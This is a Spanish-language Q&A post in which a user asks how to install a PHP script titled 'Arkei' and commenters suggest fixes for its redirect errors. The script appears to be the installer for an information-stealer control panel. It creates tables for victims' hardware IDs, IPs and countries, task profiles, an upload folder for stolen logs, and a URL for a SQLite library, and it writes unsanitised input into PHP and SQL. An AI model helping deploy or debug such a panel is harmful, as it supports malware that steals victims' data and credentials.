# como puedo configurar correctamente este php para su instalacion?

Tags: php, sql

El código es:

```
<?php
/*

*/
error_reporting(0);
require("app/config.php");

$db_server      =   "";
$db_user        =   "";
$db_password    =   "";
$db_name        =   "";

$server_addr    =   "";
$folder     =   "";

$adm_login      =   "user";
$adm_password   =   md5(checkParam($_POST["user"]));

$sqlite_lib_url = checkParam($_POST[""]);

$error = NULL;

if($config["db_server"] != null)
{
    $database = mysqli_connect($config["db_server"], $config["db_user"], $config["db_password"], $config["db_name"]);

    if(!$database)
    {
        $error = "Can't connect to database.";
        mysqli_close($database);
    }
    else
    {
        header('Location: http://'. $config["server_addr"] .'/index?action=install_success');
        exit(0);
    }
}

if(
    $db_server      != null &
    $db_user        != null &
    $db_name        != null &
    $server_addr    != null &
    $folder     != null &
    $adm_login      != null &
    $adm_password   != null &
    $sqlite_lib_url != null
)
{   
    $config_file = fopen("app/config.php", "w");
    $configuration = '<?php  $config = array("db_server" => "'. $db_server .'", "db_user" => "'. $db_user .'", "db_password" => "'. $db_password .'", "db_name" => "'. $db_name .'", "server_addr" => "'. $server_addr .'", "folder" => "'. $folder .'", "adm_login" => "'. $adm_login .'", "adm_password" => "'. $adm_password .'" ); ?>';

    fwrite($config_file, $configuration);
    fclose($config_file);

    if (!file_exists('server/'. $folder))
    {
        mkdir('server/'. $folder .'/', 0777, true);
    }

    $database = mysqli_connect($db_server, $db_user, $db_password, $db_name);

    if(!$database)
    {
        $error = "Can't connect to database.";
    }
    else
    {
        $database->query('SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";');
        $database->query('SET time_zone = "+00:00";');
        $database->query('CREATE TABLE IF NOT EXISTS `logs` (`id` int(11) NOT NULL AUTO_INCREMENT, `hwid` text NOT NULL, `system` text NOT NULL, `ip` text NOT NULL, `country` text NOT NULL, `date` text NOT NULL, `profile` int(11) NOT NULL, `count` int(11), `user` text NOT NULL NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;');
        $database->query('CREATE TABLE IF NOT EXISTS `profiles` (`id` int(11) NOT NULL AUTO_INCREMENT, `Name` text NOT NULL, `task` text NOT NULL, `Count` int(11) NOT NULL, PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;');
        $database->query("INSERT INTO `profiles` (`id`, `Name`, `task`, `Count`) VALUES(1, 'Main Profile', 'none;', 0),(2, 'Two Profile', 'none;', 0),(3, 'Three Profile', 'none;', 0),(4, 'Four Profile', 'none;', 0),(5, 'Five Profile', 'none;', 0),(6, 'Six Profile', 'none;', 0),(7, 'Seven Profile', 'none;', 0),(8, 'Eight Profile', 'none;', 0),(9, 'Nine Profile', 'none;', 0),(10, 'Ten Profile', 'none;', 0);");
        $database->query('CREATE TABLE IF NOT EXISTS `stats` (`Name` text NOT NULL, `Value` text NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=utf8;');
        $database->query("INSERT INTO `stats`(`Name`, `Value`) VALUES ('all_logs','0')");
        $database->query("INSERT INTO `stats`(`Name`, `Value`) VALUES ('all_files','0')");
        $database->query("INSERT INTO `stats`(`Name`, `Value`) VALUES ('errors','0')");
        $database->query('CREATE TABLE IF NOT EXISTS `settings` (`Name` text NOT NULL,`Value` text NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=utf8;');
        $database->query("INSERT INTO `settings`(`Name`, `Value`) VALUES ('sqlite_lib_url','$sqlite_lib_url')");

        mysqli_close($database);
    }

    header('Location: http://'. $server_addr .'/index');
    exit(0);
}
else
{
    $error = "Please enter all params!";
}

function checkParam($param)
{
    $formatted = $param;
    $formatted = trim($formatted);
    $formatted = stripslashes($formatted);
    $formatted = htmlspecialchars($formatted);

    return $formatted;
}

?>

<!doctype html>
<html lang="en-us">
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Install | Arkei</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,400i,600,700" rel="stylesheet">

    <link rel="apple-touch-icon" href="apple-touch-icon.png">
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">

    <link rel="stylesheet" href="css/main.min.css">
</head>
<body>
    <br>
    <br>

    <div class="container">
        <form id="install" action="/install" method="post">
        <div class="row">
            <div class="col-xl-3 u-hidden-down@wide">
                <aside class="c-menu u-ml-medium"></aside>
            </div>

            <div class="col-md-7 col-xl-6">
                <main>
                    <h2 class="u-h3 u-mb-small">Install</h2>

                    <? 
                    if($error != null)
                    {
                        ?>
                        <div class="c-alert c-alert--danger">
                            <i class="c-alert__icon fa fa-exclamation-triangle"></i> <? echo $error; ?></div>
                        <?
                    }
                    ?>

                    <div class="c-card u-p-medium u-text-small u-mb-small">
                        <h6 class="u-text-bold">MySQL Info</h6>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="db_server">Server Address</label>
                                <input class="c-input" id="db_server" name="db_server" type="text" placeholder="localhost" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="db_user">Username</label>
                                <input class="c-input" id="db_user" name="db_user" type="text" placeholder="root" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="db_password">Password</label>
                                <input class="c-input" id="db_password" name="db_password" type="password" placeholder="toor" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="db_name">Database Name</label>
                                <input class="c-input" id="db_name" name="db_name" type="text" placeholder="arkei" value="">
                            </div>
                        </dl>

                    </div>

                    <div class="c-card u-p-medium u-mb-small u-text-small">
                        <h6 class="u-text-bold">Server Info</h6>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="server_addr">Web-Server Addr</label>
                                <input class="c-input" id="server_addr" name="server_addr" type="text" placeholder="arkei.com" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="folder">Folder to upload logs</label>
                                <input class="c-input" id="folder" name="folder" type="text" placeholder="_files2387ygsfuasgfd7623t" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="adm_login">Admin Login</label>
                                <input class="c-input" id="adm_login" name="adm_login" type="text" placeholder="admin" value="">
                            </div>
                        </dl>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="adm_password">Admin Password</label>
                                <input class="c-input" id="adm_password" name="adm_password" type="password" placeholder="admin" value="">
                            </div>
                        </dl>

                    </div>

                    <div class="c-card u-p-medium u-mb-small u-text-small">
                        <h6 class="u-text-bold">Other</h6>

                        <dl class="u-flex u-pv-small">
                            <div class="c-field">
                                <label class="c-field__label " for="sqlite_lib_url">Sqlite Lib Url</label>
                                <input class="c-input" id="sqlite_lib_url" name="sqlite_lib_url" type="text" placeholder="http://github.com/user/example/raw/master/sqlite.dll" value="">
                            </div>
                        </dl>

                    </div>

                        <div class="col u-mb-medium" style="width:200px; margin-right: 50%;">
                            <a onclick="document.getElementById('install').submit(); return false;" class="c-btn c-btn--success c-btn--fullwidth">Install</a>
                        </div>

                </main>
            </div>

            <div class="col-md-5 col-xl-3 u-mb-medium u-hidden-down@tablet"></div>
            </form>
        </div>
    </div>
    <script src="js/main.min.js"></script>
</body>
</html>
```

Pero siempre me devuelve los mismos errores:

> 404. That’s an error. The requested URL was not found on this server.

Comment: estan vacios tus datos? $db_server      =   "";
$db_user        =   "";
$db_password    =   "";
$db_name        =   "";

Comment: En alguna parte estás intentando usar una URL que no existe, puede ser en los `header location` o en otra parte.  `header('Location: http://'. $config["server_addr"] .'/index?action=install_success');`, mejor guarda valores como estos en variables: `http://'. $config["server_addr"] .'/index?action=install_success'`, así las puedes depurar con facilidad y escribes código más limpio y entendible : - )

Comment: osea me recomiendas guardarlo en variables. tal que asi en lugar de header debo poner http://'. $config["server_addr"] .'/index?action=install_success' ?